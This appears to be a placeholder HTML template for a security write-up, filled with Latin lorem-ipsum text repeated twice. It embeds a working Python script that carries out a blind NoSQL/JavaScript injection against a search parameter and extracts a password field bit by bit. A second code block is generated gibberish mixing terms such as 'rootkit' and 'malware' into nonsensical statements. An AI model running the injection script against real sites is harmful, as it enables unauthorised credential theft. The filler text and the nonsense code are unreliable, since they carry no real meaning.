
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link href='https://fonts.googleapis.com/css?family=JetBrains Mono' rel='stylesheet'>
	<title>example writeup</title>
  </head>
  <body>
	<div class="content-container">
		<div class="text-container">
			<h1>Se qui heu</h1>
<h2>Tuae misso si morte</h2>
<p>Lorem markdownum <em>vestigia Aurorae</em>. Loci visa graves nectar collecti, quam
<code>example.toString()</code> via illa oculus; patria. Theseus cura Philyreius deam exercet loquar
delapsam tendit, Caeneus subiecit his enim! Preme patris adfuit aethera infelix
anhelitus in innubere matertera germana carior adpellatque Pirithoi; in dare
Hippomenen lacrimis! Et quoque pependit oris.</p>
<p>In putria Ulixes: quippe movit. Pone cruore herbas <em>ut</em> venerem gerit <strong>terrenae
domitis</strong> conceptaque modo, vates cinxisse, corporis. Longoque thalamosque fata
Rhodon hoc <strong>terrae</strong> ferumque sit ornant, uno vicem illi quantum.</p>
<h2>Fluminis versae</h2>
<p>Timidi Emathides pharetrae colis floribus redunco sum, tibi unda, Periphanta
retia tutus. Status nec volucris, de quid patuit una facta hunc.</p>
<ul>
<li>Cruentum et aerata in contra digitis</li>
<li>Messes ora tauri et absens fronti</li>
<li>Colloque est</li>
<li>Duxere agrestes</li>
</ul>
<p><em>Vertice frenis iuvat</em> Iuppiter trepidos! Illud est non illa fortunata mihi cava
vocavit spes videtur!</p>
<h2>Prudentia somnus</h2>
<p>Relevat in latuit et cum lenita, acrior frangitur erat <strong>amorem</strong>, si origine
mihi mirata tumefecit genuumque est, mea! In mugire tumulos comes: ut summo
nescio unius, data.</p>
<pre class="language-python"><code class="language-python"><span class="token keyword">import</span> requests
<span class="token keyword">import</span> urllib

TARGET <span class="token operator">=</span> <span class="token string">"http://xxx/?search="</span>
PROXIES <span class="token operator">=</span> <span class="token punctuation">{</span>
    <span class="token string">"http"</span><span class="token punctuation">:</span><span class="token string">"http://localhost:8080"</span><span class="token punctuation">,</span>
    <span class="token string">"https"</span><span class="token punctuation">:</span><span class="token string">"http://localhost:8080"</span>
<span class="token punctuation">}</span>

<span class="token keyword">def</span> <span class="token function">oracle</span><span class="token punctuation">(</span>condition<span class="token punctuation">)</span><span class="token punctuation">:</span>
    payload <span class="token operator">=</span> <span class="token string-interpolation"><span class="token string">f"admin'%20%26%26%20</span><span class="token interpolation"><span class="token punctuation">{</span>urllib<span class="token punctuation">.</span>parse<span class="token punctuation">.</span>quote<span class="token punctuation">(</span>condition<span class="token punctuation">)</span><span class="token punctuation">}</span></span><span class="token string">%20%00"</span></span>
    r <span class="token operator">=</span> requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>TARGET<span class="token operator">+</span>payload<span class="token punctuation">,</span> verify<span class="token operator">=</span><span class="token boolean">False</span><span class="token punctuation">,</span> proxies<span class="token operator">=</span>PROXIES<span class="token punctuation">)</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token string">b"?search=admin"</span> <span class="token keyword">in</span> r<span class="token punctuation">.</span>content<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token boolean">True</span>
    <span class="token keyword">return</span> <span class="token boolean">False</span>

<span class="token keyword">def</span> <span class="token function">exfiltrateString</span><span class="token punctuation">(</span>field<span class="token punctuation">,</span> length<span class="token punctuation">)</span><span class="token punctuation">:</span>
    binary <span class="token operator">=</span> <span class="token string">""</span>
    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span>length<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">if</span> i <span class="token operator">!=</span> <span class="token number">0</span><span class="token punctuation">:</span> binary <span class="token operator">=</span> binary <span class="token operator">+</span> <span class="token string">" "</span>
        <span class="token keyword">for</span> j <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            <span class="token keyword">if</span> oracle<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"('0'.repeat(Math.max(0,8-this.</span><span class="token interpolation"><span class="token punctuation">{</span>field<span class="token punctuation">}</span></span><span class="token string">.charCodeAt(</span><span class="token interpolation"><span class="token punctuation">{</span>i<span class="token punctuation">}</span></span><span class="token string">).toString(2).length))+this.password.charCodeAt(</span><span class="token interpolation"><span class="token punctuation">{</span>i<span class="token punctuation">}</span></span><span class="token string">).toString(2))[</span><span class="token interpolation"><span class="token punctuation">{</span>j<span class="token punctuation">}</span></span><span class="token string">]==1"</span></span><span class="token punctuation">)</span><span class="token punctuation">:</span>
                binary <span class="token operator">=</span> binary <span class="token operator">+</span> <span class="token string">"1"</span>
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                binary <span class="token operator">=</span> binary <span class="token operator">+</span> <span class="token string">"0"</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>binary<span class="token punctuation">)</span>


<span class="token keyword">assert</span> oracle<span class="token punctuation">(</span><span class="token string">"1===1"</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token boolean">True</span>
<span class="token keyword">assert</span> oracle<span class="token punctuation">(</span><span class="token string">"1===0"</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token boolean">False</span>

exfiltrateString<span class="token punctuation">(</span><span class="token string">"password"</span><span class="token punctuation">,</span> <span class="token number">36</span><span class="token punctuation">)</span></code></pre>
<p>Certe probavit quam non praeside, sibi quoque Amathunta proxima. Ope <a href="http://vulgaruntamplexas.io/">causa
accepere</a> macies ortygiam mutata suus tuorum
ignes, mollis <strong>timuitque sortitus init</strong>. Quae <a href="http://achille-ut.com/nil.html">nescisse
festo</a>; volucri virginitas laedam inclusaque
gente fragorem posset, palluerat adhuc quibus est annis acerris inpulsu.
Montanaque medii commune, tulit et mihi altera <a href="http://www.cadunt.net/sequitur-inrorant">caelumque
moenia</a>.</p>
<h1>Se qui heu</h1>
<h2>Tuae misso si morte</h2>
<p>Lorem markdownum <em>vestigia Aurorae</em>. Loci visa graves nectar collecti, quam
iterum via illa oculus; patria. Theseus cura Philyreius deam exercet loquar
delapsam tendit, Caeneus subiecit his enim! Preme patris adfuit aethera infelix
anhelitus in innubere matertera germana carior adpellatque Pirithoi; in dare
Hippomenen lacrimis! Et quoque pependit oris.</p>
<p>In putria Ulixes: quippe movit. Pone cruore herbas <em>ut</em> venerem gerit <strong>terrenae
domitis</strong> conceptaque modo, vates cinxisse, corporis. Longoque thalamosque fata
Rhodon hoc <strong>terrae</strong> ferumque sit ornant, uno vicem illi quantum.</p>
<h2>Fluminis versae</h2>
<p>Timidi Emathides pharetrae colis floribus redunco sum, tibi unda, Periphanta
retia tutus. Status nec volucris, de quid patuit una facta hunc.</p>
<ul>
<li>Cruentum et aerata in contra digitis</li>
<li>Messes ora tauri et absens fronti</li>
<li>Colloque est</li>
<li>Duxere agrestes</li>
</ul>
<p><em>Vertice frenis iuvat</em> Iuppiter trepidos! Illud est non illa fortunata mihi cava
vocavit spes videtur!</p>
<h2>Prudentia somnus</h2>
<p>Relevat in latuit et cum lenita, acrior frangitur erat <strong>amorem</strong>, si origine
mihi mirata tumefecit genuumque est, mea! In mugire tumulos comes: ut summo
nescio unius, data.</p>
<pre class="language-python"><code class="language-python">bash <span class="token operator">=</span> rootkitRiscDrag <span class="token operator">*</span> sram_address_metal<span class="token punctuation">;</span>
controlTraceroute<span class="token punctuation">.</span>interfaceQuadFlops<span class="token punctuation">(</span><span class="token number">87693</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
var portSimplex <span class="token operator">=</span> multiplatform<span class="token punctuation">;</span>
malwareIspSystem <span class="token operator">=</span> <span class="token number">2</span> <span class="token operator">+</span> <span class="token number">3</span> <span class="token operator">+</span> <span class="token number">77</span> <span class="token operator">/</span> pdfDvSip<span class="token punctuation">.</span>applet<span class="token punctuation">.</span>broadband<span class="token punctuation">(</span>recursive<span class="token punctuation">.</span>balance<span class="token punctuation">(</span>address_cyberbullying_pdf<span class="token punctuation">,</span> system_switch<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>
<p>Certe probavit quam non praeside, sibi quoque Amathunta proxima. Ope <a href="http://vulgaruntamplexas.io/">causa
accepere</a> macies ortygiam mutata suus tuorum
ignes, mollis <strong>timuitque sortitus init</strong>. Quae <a href="http://achille-ut.com/nil.html">nescisse
festo</a>; volucri virginitas laedam inclusaque
gente fragorem posset, palluerat adhuc quibus est annis acerris inpulsu.
Montanaque medii commune, tulit et mihi altera <a href="http://www.cadunt.net/sequitur-inrorant">caelumque
moenia</a>.</p>

		</div>
	</div>
  </body>


	<style>
		body {
			background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAABTElEQVRYha1WWw7DMAjLquYYk7b7H7GTtq9UbWpsQ8fXVh4xJIAfz9f7227IZ9tC3do71bfW2lINPuvW3lP+w2cHgIxHUKZzDhu2yGeZjVAwV6d8EEh4BSw7V6fKvwNwDN37jWId/edYS1TCCqhIfwQ2fg/96QrmDNwyIkDKd+hPAOYgKijKLCt0DszCAKIrUfodQGbgVL9FZywzuqjPWSsie2ULH6HjoCT7kOUbiAI4FWGgYRdkZr4z9ZyxTdsQyR0bmGC1f6PDUIWYXLogCuwcrvzCbej0NRoqTvXUY7XbkA0V9l9t0ss2ZM5uu6kkjnrKB1Bm1fUdAYOUjDlmyov+hwCyC+n4ndEyVTGLEyr9nf0B50C2zJE4I9rmA5XH57wdSEorWSvyETIiNgUjSlWlXxAAU0ZZVRYYpWRD/rWOM7xCEhInuDqM2fwAG58SrpqDi2sAAAAASUVORK5CYII=");
			font-family: 'JetBrains Mono';
			background-color: #191B1C;
		}

		.content-container {
			background-color: #1D2021;
			box-sizing: content-box;
			width: 95vw;
			display: flex;
			flex-direction: column;
			justify-content: left;
			height: 100%;
			margin: auto;
			margin-top: 10vh;
			margin-bottom: 10vh;
			border: 1px solid #B8BB26;
			max-width: 150vh;
		}

		.text-container {
			color: #D3C4A1;
			padding: 1vw;
			font-size: calc(0.7vw + 0.7vh);
		}

		ul {
			padding-left: 2vh;	
		}

		code:not([class]) {
			color: #B8BB26;
			font-size: calc(0.7vw + 0.7vh);
			font-style: italic; 
		}

		a {
			color: #B8BB26;
			font-weight: bold;
			text-decoration: underline;
		}

		/**
		 * Gruvbox dark theme
		 *
		 * Adapted from a theme based on:
		 * Vim Gruvbox dark Theme (https://github.com/morhetz/gruvbox)
		 *
		 * @author Azat S. <to@azat.io>
		 * @version 1.0
		 */

		code[class*="language-"],
		pre[class*="language-"] {
			color: #ebdbb2; /* fg1 / fg */
			font-family: Consolas, Monaco, "Andale Mono", monospace;
			direction: ltr;
			text-align: left;
			white-space: pre;
			word-spacing: normal;
			word-break: normal;
			line-height: 1.5;

			-moz-tab-size: 4;
			-o-tab-size: 4;
			tab-size: 4;

			-webkit-hyphens: none;
			-moz-hyphens: none;
			-ms-hyphens: none;
			hyphens: none;
		}

		pre[class*="language-"]::-moz-selection,
		pre[class*="language-"] ::-moz-selection,
		code[class*="language-"]::-moz-selection,
		code[class*="language-"] ::-moz-selection {
			color: #fbf1c7; /* fg0 */
			background: #7c6f64; /* bg4 */
		}

		pre[class*="language-"]::selection,
		pre[class*="language-"] ::selection,
		code[class*="language-"]::selection,
		code[class*="language-"] ::selection {
			color: #fbf1c7; /* fg0 */
			background: #7c6f64; /* bg4 */
		}

		/* Code blocks */
		pre[class*="language-"] {
			padding: 1em;
			margin: 0.5em 0;
			overflow: auto;
		}

		:not(pre) > code[class*="language-"],
		pre[class*="language-"] {
			background: #191B1C; /* bg0_h */
			border: 1px solid #665C54;
		}

		/* Inline code */
		:not(pre) > code[class*="language-"] {
			padding: 0.1em;
			border-radius: 0.3em;
		}

		.token.comment,
		.token.prolog,
		.token.cdata {
			color: #a89984; /* fg4 / gray1 */
		}

		.token.delimiter,
		.token.boolean,
		.token.keyword,
		.token.selector,
		.token.important,
		.token.atrule {
			color: #fb4934; /* red2 */
		}

		.token.operator,
		.token.punctuation,
		.token.attr-name {
			color: #a89984; /* fg4 / gray1 */
		}

		.token.tag,
		.token.tag .punctuation,
		.token.doctype,
		.token.builtin {
			color: #fabd2f; /* yellow2 */
		}

		.token.entity,
		.token.number,
		.token.symbol {
			color: #d3869b; /* purple2 */
		}

		.token.property,
		.token.constant,
		.token.variable {
			color: #fb4934; /* red2 */
		}

		.token.string,
		.token.char {
			color: #b8bb26; /* green2 */
		}

		.token.attr-value,
		.token.attr-value .punctuation {
			color: #a89984; /* fg4 / gray1 */
		}

		.token.url {
			color: #b8bb26; /* green2 */
			text-decoration: underline;
		}

		.token.function {
			color: #fabd2f; /* yellow2 */
		}

		.token.regex {
			background: #b8bb26; /* green2 */
		}

		.token.bold {
			font-weight: bold;
		}

		.token.italic {
			font-style: italic;
		}

		.token.inserted {
			background: #a89984; /* fg4 / gray1 */
		}

		.token.deleted {
			background: #fb4934; /* red2 */
		}
	</style>
</html>
